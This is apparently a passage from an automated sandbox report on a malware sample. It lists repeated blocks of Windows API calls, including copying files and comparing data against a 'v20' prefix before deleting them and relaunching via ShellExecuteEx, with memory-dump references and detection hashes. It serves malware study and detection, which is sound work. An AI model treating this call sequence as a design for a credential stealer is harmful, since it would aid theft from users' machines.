                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                  • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3466090806-0
                                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                  APIs
                                                  • __getptd.LIBCMT ref: 02F1C9B5
                                                    • Part of subcall function 02F1C206: __getptd_noexit.LIBCMT ref: 02F1C209
                                                    • Part of subcall function 02F1C206: __amsg_exit.LIBCMT ref: 02F1C216
                                                  • __getptd.LIBCMT ref: 02F1C9CC
                                                  • __amsg_exit.LIBCMT ref: 02F1C9DA
                                                  • __lock.LIBCMT ref: 02F1C9EA
                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 02F1C9FE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                  • String ID:
                                                  • API String ID: 938513278-0
                                                  • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                  • Instruction ID: 5bde0dd2ac79e919cdfd4212b3bc08265a341b3ed5065a88642810daec09ea8c
                                                  • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                  • Instruction Fuzzy Hash: 7DF06D32A802149BD725BBA89C1275D37A1AF007E8FD1010BD614AA1D0DB245540DF9B
                                                  APIs
                                                  • __getptd.LIBCMT ref: 0041C74E
                                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                  • __getptd.LIBCMT ref: 0041C765
                                                  • __amsg_exit.LIBCMT ref: 0041C773
                                                  • __lock.LIBCMT ref: 0041C783
                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                  • String ID:
                                                  • API String ID: 938513278-0
                                                  • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                  • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                  • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                  • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                  APIs
                                                  • StrCmpCA.SHLWAPI(00000000,02D45A70), ref: 0041079A
                                                  • StrCmpCA.SHLWAPI(00000000,02D45B10), ref: 00410866
                                                  • StrCmpCA.SHLWAPI(00000000,02D45B20), ref: 0041099D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy
                                                  • String ID: `_A
                                                  • API String ID: 3722407311-2339250863
                                                  • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                  • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                  • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                  • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                  APIs
                                                  • StrCmpCA.SHLWAPI(00000000,02D45A70), ref: 0041079A
                                                  • StrCmpCA.SHLWAPI(00000000,02D45B10), ref: 00410866
                                                  • StrCmpCA.SHLWAPI(00000000,02D45B20), ref: 0041099D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy
                                                  • String ID: `_A
                                                  • API String ID: 3722407311-2339250863
                                                  • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                  • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                  • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                  • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 02F168CA
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 02F1698D
                                                  • ExitProcess.KERNEL32 ref: 02F169BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                  • String ID: <
                                                  • API String ID: 1148417306-4251816714
                                                  • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                  • Instruction ID: 24a0fbad5d2d399d8251e9bccd5c78075dca78f702b328476c75e083ed82b693
                                                  • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                  • Instruction Fuzzy Hash: 37314DF1901218ABDB18EB90DD95FDEB77AAF04340F805189E309A6190EF746B88CF59
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                  • ExitProcess.KERNEL32 ref: 00416755
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                  • String ID: <
                                                  • API String ID: 1148417306-4251816714
                                                  • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                  • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                  • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                  • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID: @Jn@$Jn@$Jn@
                                                  • API String ID: 544645111-1180188686
                                                  • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                  • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                                  • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                  • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                                  APIs
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcatlstrcpy
                                                  • String ID: vI@$vI@
                                                  • API String ID: 3905823039-1245421781
                                                  • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                  • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                  • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                  • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                  • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                  • wsprintfW.USER32 ref: 00418D78
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocProcesswsprintf
                                                  • String ID: %hs
                                                  • API String ID: 659108358-2783943728
                                                  • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                  • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                  • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                  • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02F0A548
                                                  • lstrlen.KERNEL32(00000000,00000000), ref: 02F0A666
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0A923
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02F0A094
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F0A9AA
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                  • String ID:
                                                  • API String ID: 257331557-0
                                                  • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                  • Instruction ID: 6ede23f1cd4e330f09dbd14e252c0a9c923184b1f510cad77e583338c815697d
                                                  • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                  • Instruction Fuzzy Hash: 74E1F072911218EBCB19FBA4DD90DEEB73AAF54740F908159E216B2090EF346B4CCF61
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                  • String ID:
                                                  • API String ID: 257331557-0
                                                  • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                  • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                  • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                  • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02F0D6E8
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0D8FF
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0D913
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F0D992
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02F0DA68
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0DC06
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0DC1A
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F0DC99
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
